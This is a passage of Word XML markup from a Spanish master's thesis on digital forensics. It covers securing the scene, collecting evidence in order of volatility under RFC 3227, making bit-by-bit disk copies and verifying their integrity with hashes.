      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El Trabajo de Fin de Máster (TFM) se centra en un caso donde el jefe de una empresa sospecha, sin pruebas, del acceso ilícito a su sistema, requiriendo así una investigación inicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33A57A" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRPr="00933CF8" w:rsidRDefault="00933CF8" w:rsidP="00933CF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se explora el aspecto legal y la posibilidad de contaminación de pruebas en relación con un presunto delito contemplado en el código penal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307955A7" w14:textId="39D7AFC0" w:rsidR="004E71C8" w:rsidRPr="004E71C8" w:rsidRDefault="00933CF8" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En tales situaciones, las Fuerzas y Cuerpos de Seguridad del Estado, bajo la autorización de un juzgado de instrucción, son los responsables de llevar a cabo el análisis forense del hecho sospechado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F115316" w14:textId="77777777" w:rsidR="004E71C8" w:rsidRDefault="00062086" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identificación</w:t>
      </w:r>
      <w:r w:rsidR="006F21A3" w:rsidRPr="00C43B18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA66B8" w14:textId="5CE66DDB" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En el caso del presente TFM, en el enunciado hemos recibido y el material didáctico que se adjunta, se han realizado </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>previa y satisfactoriamente</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> todos los pasos de esta metodología.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4F8AA" w14:textId="1F74AD0B" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cabe destacar en </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>una</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las tareas dedicadas a la identificación, nos encontramos con la tarea de asegurar la escena, es recomendable realizar las siguientes acciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B226368" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRPr="00933CF8" w:rsidRDefault="00933CF8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomar fotografías del entorno del equipo para documentar el estado original de la escena y delimitar el área a investigar, evitando el acceso de personal no autorizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368067AF" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRPr="00933CF8" w:rsidRDefault="00933CF8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proteger las huellas dactilares en los equipos, usando guantes de látex o similares, para facilitar la labor de otros cuerpos de policía e investigadores. Se menciona el principio de intercambio de Locard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175E2CA" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRPr="00933CF8" w:rsidRDefault="00933CF8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Registrar la hora y fecha de los equipos implicados, que pueden diferir de la hora real. Es crucial documentar cualquier discrepancia para la investigación y la creación de una línea temporal de los eventos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068B0D4" w14:textId="525187A9" w:rsidR="00933CF8" w:rsidRDefault="00933CF8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Observar y grabar cualquier proceso en pantalla que pueda ofrecer información relevante, así como evaluar las entradas y salidas de los equipos y otros periféricos como impresoras, teléfonos IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y escáneres, para obtener pistas adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3041F" w14:textId="40B51C7C" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="00062086" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Adquisición</w:t>
      </w:r>
      <w:r w:rsidR="006F21A3" w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BCEE3C" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRDefault="00933CF8" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Antes de recoger evidencias, es importante establecer su orden de prioridad basado en la volatilidad de los datos. Esto implica identificar qué datos son más propensos a cambiar o desaparecer y recolectarlos primero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB24E4" w14:textId="3CC08D13" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Entendemos por volatilidad de los datos el período de tiempo en el que estarán accesibles en el equipo. Por lo tanto, se deberán recolectar previamente aquellas pruebas más volátiles. Según la </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RFC</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RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados."</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3227, el que se presenta a continuación, es un posible orden de volatilidad de mayor a menor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18830484" w14:textId="41F0EB71" w:rsidR="006F21A3" w:rsidRDefault="00B651A7" w:rsidP="00696354">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251618304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05F16993" wp14:editId="4121E2D5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9084</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2787650" cy="1868170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="177333461" name="Imagen 6"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3461" name="Imagen 6" descr="Tabla&#10;&#10;Descripción generada automáticamente con confianza media"/>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87650" cy="1868170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E38B9" w14:textId="6871B865" w:rsidR="002F2988" w:rsidRDefault="002F2988" w:rsidP="00C0394C">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D466F11" w14:textId="4990F4AA" w:rsidR="002F2988" w:rsidRDefault="007B14FB" w:rsidP="00C0394C">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73A3ACF4" wp14:editId="0E4C8167">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2950624</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>234867</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2639695" cy="635"/>
                <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="944597931" name="Cuadro de texto 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2639695" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2EC69BCE" w14:textId="02604748" w:rsidR="007B14FB" w:rsidRPr="00956DA5" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                              <w:r w:rsidR="00117A4E">
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                                <w:t>3</w:t>
                              </w:r>
                            </w:fldSimple>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="10" w:name="_Toc155782570"/>
                            <w:r>
                              <w:t>O</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007E5E1A">
                              <w:t xml:space="preserve">rden de </w:t>
                            </w:r>
                            <w:r>
                              <w:t>v</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007E5E1A">
                              <w:t>olatilidad de los datos.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A3ACF4" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:232.35pt;margin-top:18.5pt;width:207.85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J0GQIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L05SNFiN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p7OZudnfLmaTY7OY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AeQe53gAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj7FOwzAQhnck3sE6&#10;JBZEndIojdI4VVXBAEtF6MLmxm6cEp8j22nD23Od6Hh3n/77/nI92Z6dtQ+dQwHzWQJMY+NUh62A&#10;/dfbcw4sRIlK9g61gF8dYF3d35WyUO6Cn/pcx5ZRCIZCCjAxDgXnoTHayjBzg0a6HZ23MtLoW668&#10;vFC47flLkmTcyg7pg5GD3hrd/NSjFbBLv3fmaTy+fmzShX/fj9vs1NZCPD5MmxWwqKf4D8NVn9Sh&#10;IqeDG1EF1gtIs3RJqIDFkjoRkOdJCuxwXcyBVyW/bVD9AQAA//8DAFBLAQItABQABgAIAAAAIQC2&#10;gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAI9RQnQZAgAAPwQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAAeQe53gAAAACQEAAA8AAAAAAAAAAAAAAAAAcwQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAACABQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2EC69BCE" w14:textId="02604748" w:rsidR="007B14FB" w:rsidRPr="00956DA5" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                        <w:r w:rsidR="00117A4E">
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                      </w:fldSimple>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:bookmarkStart w:id="11" w:name="_Toc155782570"/>
                      <w:r>
                        <w:t>O</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007E5E1A">
                        <w:t xml:space="preserve">rden de </w:t>
                      </w:r>
                      <w:r>
                        <w:t>v</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007E5E1A">
                        <w:t>olatilidad de los datos.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="11"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288C87A" w14:textId="2FF51BC1" w:rsidR="002F2988" w:rsidRDefault="002F2988" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A1506B" w14:textId="3A339BAB" w:rsidR="002F2988" w:rsidRDefault="002F2988" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67209F54" w14:textId="78214DFB" w:rsidR="002F2988" w:rsidRDefault="002F2988" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679CD6DA" w14:textId="77777777" w:rsidR="001D7290" w:rsidRDefault="001D7290" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E25F10B" w14:textId="75BAE803" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como ya se ha indicado previamente, </w:t>
      </w:r>
      <w:r w:rsidR="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ara procedimientos penales, es necesario que una autoridad legal (como un secretario judicial o un notario) supervise la recogida de evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D117A" w14:textId="26434383" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidR="00933CF8" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>última</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tarea de esta fase es la recogida de evidencias, </w:t>
      </w:r>
      <w:r w:rsidR="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a recolección de evidencias implica hacer una copia bit a bit de los discos que se van a analizar. Esta copia debe ser exacta y abarcar todos los archivos del disco, incluyendo archivos temporales, </w:t>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ocultos, de configuración, </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eliminados,</w:t>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero no sobrescritos, y la información de las partes del disco no asignadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BC39D" w14:textId="77777777" w:rsidR="00494389" w:rsidRPr="00494389" w:rsidRDefault="00494389" w:rsidP="00494389">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La copia se debe realizar en un soporte limpio, previamente borrado de manera segura para evitar la contaminación con otros casos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE46603" w14:textId="77777777" w:rsidR="001D7290" w:rsidRDefault="001D7290" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716A0C49" w14:textId="06EB5339" w:rsidR="006F21A3" w:rsidRPr="00933CF8" w:rsidRDefault="00062086" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preservación</w:t>
      </w:r>
      <w:r w:rsidR="00933CF8" w:rsidRPr="00933CF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CBB2B8" w14:textId="2A8853B5" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta </w:t>
      </w:r>
      <w:r w:rsidR="00933CF8" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acción</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, se ha realizado al igual que las anteriores, ha sido realizada de manera previa a la elaboración del TFM</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, para ello se </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deben tener</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cuenta las siguientes consideraciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A0E7B" w14:textId="6CDC49B0" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una vez realizada la copia se debe verificar la integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esta</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Para ello se calcula el hash</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Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</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 xml:space="preserve"> o CRC</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CRC (Cyclic Redundancy Check): Método utilizado para detectar errores en la transmisión de datos."</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 xml:space="preserve"> de la copia, normalmente los equipos destinados </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">al clonado de discos ya incorporan esa característica. Así </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>con el hash</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Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</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 xml:space="preserve"> del disco original y el de la copia se puede certificar que ambos son idénticos a todos los niveles y ante un juez, por ejemplo, quedará probado que no se ha manipulado de ningún modo. Con este procedimiento también nos aseguraremos </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
